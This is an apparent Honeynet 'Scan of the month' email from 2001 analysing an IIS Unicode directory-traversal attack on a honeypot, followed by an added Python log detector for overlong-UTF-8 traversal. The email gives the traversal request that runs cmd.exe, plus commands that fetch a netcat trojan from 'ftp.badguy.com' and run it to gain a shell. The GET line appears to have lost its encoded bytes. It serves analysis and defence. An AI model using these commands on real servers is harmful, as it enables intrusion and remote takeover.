From yoann.lecorvic@infrasoft-civil.com Sun Feb 18 21:37:41 2001
Date: Thu, 01 Feb 2001 15:22:25 +0000
From: Yoann LeCorvic
To: project@honeynet.org
Subject: Scan of the month

Hi There

Here we go then, this is what I think:

--What is the operating system of the honeypot, how do you know?

This is an NT 4, running IIS 4 Web Server. This is known because of the HTTP reply:

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0

--What is the name of this attack?

IIS Unicode Binary Traversal Attack. One of the directory traversal attacks on IIS.

--What is the attack attempting to accomplish?

Access files on the machine that are out of the WebServer root. Possibly read and modify them through cmd shell. In the present case, it just did a DIR C:\. It also tries to fool IDSes by hiding what it is really doing.

--How does the attack work?

This is a bad input validation from IIS. By replacing the \ or / by a unicode equivalent, it is possible to trick IIS to access files out of the Web Root. There are a lot of unicode characters that can be used. C0 AF is in fact a long representation for / for IIS, and that allows to hide the ../../../ (as read by IIS) as ....../.... for an IDS.

So

GET /msadc/....../....../....../winnt/system32/cmd.exe?/c+dir+c:

is in fact

GET /msadc/../../../../../../winnt/system32/cmd.exe?/c+dir+c:

Which accesses cmd and returns the result of dir c:

--BONUS QUESTION: Is it possible to gain remote control of the system using this technique? If so, how?

All Microsoft products with TCP/IP installed come with a DOS ftp client. Using this traversal attack send the command

echo "open ftp.badguy.com" > ftp.txt
echo "get nc99.exe" >> ftp.txt

(or any other trojan) and run

/winnt/system32/ftp.exe -s:ftp.txt

then run NC99...
Please feel free to correct my mistakes

Yoann Le Corvic - Internet Administrator
Email : yoann.lecorvic@infrasoft-civil.com
Web : http://www.infrasoft-civil.com/
========================
Infrasoft Ltd
North Heath Lane
Horsham, West Sussex
RH12 5QE
United Kingdom
Tel : +44 (0)1403 259511
Fax : +44 (0)1403 217728
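A defender-side check for the overlong-UTF-8 traversal the mail describes, added here as an example and not part of the original submission or the Honeynet Project's material: it decodes the percent-encoded request path the way the lenient IIS decoder did (accepting C0 AF as "/" and C1 9C as "\"), so that the detector sees the same "../../../" the server saw, then flags requests whose canonical path climbs above the web root or whose separators only appear after overlong decoding. The log lines, the simplified log format and all function names are constructed for illustration and are assumptions of this example.

```python
"""Detect IIS Unicode (overlong UTF-8) directory traversal in web request logs.

Added example, not part of the original email. The log format below is a
constructed simplification of an IIS-style request log:
    <client-ip> <method> <uri-stem> <uri-query> <status>
"""
import re
from urllib.parse import unquote_to_bytes

# Constructed sample log lines (not from the honeypot capture).
SAMPLE_LOG = """\
10.0.0.5 GET /index.html - 200
10.0.0.7 GET /msadc/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe /c+dir+c: 200
10.0.0.7 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir 200
10.0.0.9 GET /images/logo.gif - 200
10.0.0.7 GET /msadc/../../winnt/system32/cmd.exe /c+dir 404
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d+)$')


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 while also accepting overlong 2- and 3-byte encodings of
    ASCII (e.g. C0 AF -> '/'). A strict decoder rejects those sequences; the
    vulnerable server accepted them, which is exactly what the attack relies on,
    so the detector must emulate the lenient behaviour to see the real path."""
    out = []
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < n and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        elif (0xE0 <= b <= 0xEF and i + 2 < n
              and 0x80 <= data[i + 1] <= 0xBF and 0x80 <= data[i + 2] <= 0xBF):
            cp = ((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F)
            out.append(chr(cp))
            i += 3
        else:
            out.append('\ufffd')  # invalid lead/continuation byte: replacement char
            i += 1
    return ''.join(out)


def canonical_path(uri_stem: str) -> str:
    """Percent-decode leniently and map backslashes to forward slashes."""
    return lenient_utf8_decode(unquote_to_bytes(uri_stem)).replace('\\', '/')


def escapes_root(path: str) -> bool:
    """True if the '..' segments ever climb above the web root."""
    depth = 0
    for seg in path.split('/'):
        if seg in ('', '.'):
            continue
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def overlong_separator(uri_stem: str) -> bool:
    """True if lenient decoding produced separators a strict decoder would not,
    i.e. the request hid '/' or '\\' behind an overlong encoding."""
    raw = unquote_to_bytes(uri_stem)
    strict = raw.decode('utf-8', errors='replace')
    lenient = lenient_utf8_decode(raw)
    count = lambda s: s.count('/') + s.count('\\')
    return count(lenient) > count(strict)


def analyze_log(text: str) -> list:
    """Return one finding per suspicious request line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, stem, _query, _status = m.groups()
        canon = canonical_path(stem)
        esc, overlong = escapes_root(canon), overlong_separator(stem)
        if esc or overlong:
            findings.append({'line': lineno, 'client': client, 'canonical': canon,
                             'escapes_root': esc, 'overlong_separator': overlong})
    return findings


if __name__ == '__main__':
    for f in analyze_log(SAMPLE_LOG):
        print(f)
```

Note that line 5 of the sample is flagged on the traversal alone (plain "../.." with no overlong bytes), while lines 2 and 3 are flagged on both counts; a rule that only matches the literal string "../" would miss lines 2 and 3 entirely, which is the IDS-evasion point the mail makes.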